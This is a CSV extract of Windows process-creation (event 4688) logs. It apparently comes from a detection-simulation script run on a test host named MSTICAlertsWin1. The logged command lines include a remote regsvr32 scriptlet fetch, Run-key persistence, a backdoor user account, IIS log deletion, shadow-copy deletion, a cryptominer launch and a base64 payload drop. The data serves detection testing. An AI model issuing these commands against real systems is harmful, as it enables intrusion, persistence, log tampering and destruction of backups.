48,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.340,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32 /C 42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.340
49,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.353,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1738,C:\Diagnostics\UserTmp\42424.exe,%%1936,0x1728,42424.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.353
50,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.400,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x175c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32 /C c:\users\MSTICAdmin\42424.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.400
51,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.430,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x176c,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32 /C 1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.430
52,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.447,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a8,C:\Diagnostics\UserTmp\1234.exe,%%1936,0x176c,1234.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.447
53,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a0,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32 /C c:\users\MSTICAdmin\1234.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.500
54,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.510,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17cc,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32 /C reg.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.510
55,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17e8,C:\Diagnostics\UserTmp\reg.exe,%%1936,0x17cc,reg.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.520
56,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.563,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x143c,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.563
57,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.613,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1064,C:\Diagnostics\UserTmp\tsetup.1.exe,%%1936,0xbc8,"c:\Diagnostics\UserTmp\tsetup.1.exe C:\Users\MSTICAdmin\AppData\Local\Temp\2\is-01DD7.tmp\tsetup.1.0.14.tmp"" /SL5=""$250276,19992586,423424,C:\Users\MSTICAdmin\Downloads\tsetup.1.0.14.exe",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.613
58,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.663,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1434,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,".\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!)",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.663
59,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.677,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,".\netsh.exe ""in (*.exe) do start # artificial commandline solely for purposes of triggering test""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.677
60,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.720,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1404,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd /c ""cd /d ""C:\inetpub\wwwroot""&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.720
61,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.767,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x148c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd /c ""cd /d ""C:\inetpub\wwwroot""&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.767
62,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.807,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd /c ""cd /d ""C:\inetpub\wwwroot""&powershell winrm set winrm/config/service/Auth @{Kerberos=003D""true""}&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.807
63,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.850,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd /c ""cd /d ""C:\ProgramData""© \\[REDACTED]\c$\users\[REDACTED]\Documents\""Password Change Dates.docx""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.850
64,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.893,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ec,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd /c ""cd /d ""C:\inetpub\wwwroot""&c:\windows\system32\inetsrv\appcmd set config ""Default Web Site/"" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.893
65,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,".\cmd /c ""cd /d ""C:\inetpub\wwwroot""&del C:\inetpub\logs\logFiles\W3SVC1\*.log /q&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.967
66,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.020,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Diagnostics\UserTmp\perfc.dat,%%1936,0xbc8,c:\Diagnostics\UserTmp\perfc.dat ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.020
67,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.077,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1564,C:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.077
68,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.127,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x155c,C:\Diagnostics\UserTmp\doubleextension.pdf.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\doubleextension.pdf.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.127
69,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.137,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1550,C:\Windows\System32\vssadmin.exe,%%1936,0xbc8,vssadmin delete shadows /all /quiet,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.137
70,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:24.003
71,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:24.023
72,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:25.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x244,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:25.517
73,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:14:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa10,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:14:26.013
74,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc54,C:\Windows\System32\dllhost.exe,%%1936,0x280,C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E},C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.017
75,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.047,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbc8,C:\Windows\System32\cmd.exe,%%1936,0x440,cmd.exe /c c:\Diagnostics\WindowsSimulateDetections.bat c:\Diagnostics\UserTmp,C:\Windows\System32\svchost.exe,0xfaac27,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.047
76,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.057,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x10cc,C:\Windows\System32\conhost.exe,%%1936,0xbc8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.057
77,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.247,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1288,C:\Windows\System32\cmd.exe,%%1936,0xbc8,cmd /c echo Any questions about the commands executed here then please contact one of,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.247
78,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.257,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x3dc,C:\Windows\System32\cmd.exe,%%1936,0xbc8,cmd /c echo [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected],C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.257
79,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.390,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x2a8,C:\Windows\System32\net.exe,%%1936,0xbc8,net user adm1nistrator Bob_testing /add,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.390
80,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.410,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xa5c,C:\Windows\System32\net1.exe,%%1936,0x2a8,C:\Windows\system32\net1 user adm1nistrator Bob_testing /add,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.410
81,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.503,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xfc0,C:\Windows\System32\net.exe,%%1936,0xbc8,"net share TestShare=c:\testshare /Grant:Users,Read",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.503
82,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.517,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x10b8,C:\Windows\System32\net1.exe,%%1936,0xfc0,"C:\Windows\system32\net1 share TestShare=c:\testshare /Grant:Users,Read",C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.517
83,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.543,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x132c,C:\Windows\System32\Dism.exe,%%1936,0x77c,dism /online /enable-feature /featurename:File-Services /NoRestart,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.543
84,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.550,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x4e8,C:\Windows\System32\conhost.exe,%%1936,0x132c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\Dism.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.550
85,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.830,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xcd8,C:\Windows\System32\net.exe,%%1936,0xbc8,net use q: \\MSTICAlertsWin1\TestShare Bob_testing /User:adm1nistrator,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.830
86,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.850,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x97c,C:\Windows\Temp\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\DismHost.exe,%%1936,0x132c,C:\Windows\TEMP\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04},C:\Windows\System32\Dism.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.850
87,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:04.507,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\servicing\TrustedInstaller.exe,%%1936,0x230,C:\Windows\servicing\TrustedInstaller.exe,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:04.507
88,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:05.193,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe68,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\TiWorker.exe,%%1936,0x280,C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\TiWorker.exe -Embedding,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:05.193
89,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:08.723,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x12fc,C:\Windows\System32\net.exe,%%1936,0xbc8,net use q: /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:08.723
90,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.667,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xc18,C:\Windows\System32\net.exe,%%1936,0xbc8,net share TestShare /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.667
91,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.683,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Windows\System32\net1.exe,%%1936,0xc18,C:\Windows\system32\net1 share TestShare /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.683
92,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.707,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1274,C:\Windows\System32\net.exe,%%1936,0xbc8,net user adm1nistrator /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.707
93,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.730,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x614,C:\Windows\System32\net1.exe,%%1936,0x1274,C:\Windows\system32\net1 user adm1nistrator /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.730
94,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.753,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xd10,C:\Diagnostics\UserTmp\regsvr32.exe,%%1936,0xbc8,.\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.753
95,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:10.817,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\svchost.exe,%%1936,0x230,C:\Windows\system32\svchost.exe -k wsappx,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.817
96,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.190,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x135c,C:\Windows\System32\win32calc.exe,%%1936,0xd10,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\regsvr32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.190
97,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.260,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x103c,C:\Diagnostics\UserTmp\suchost.exe,%%1936,0xbc8,.\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.260
98,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.347,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1014,C:\Windows\System32\win32calc.exe,%%1936,0x103c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\suchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.347
99,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.413,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.413
100,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x11cc,C:\Windows\System32\win32calc.exe,%%1936,0xbb4,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.493
101,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.537,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x123c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.537
102,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.617,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x132c,C:\Windows\System32\win32calc.exe,%%1936,0x123c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.617
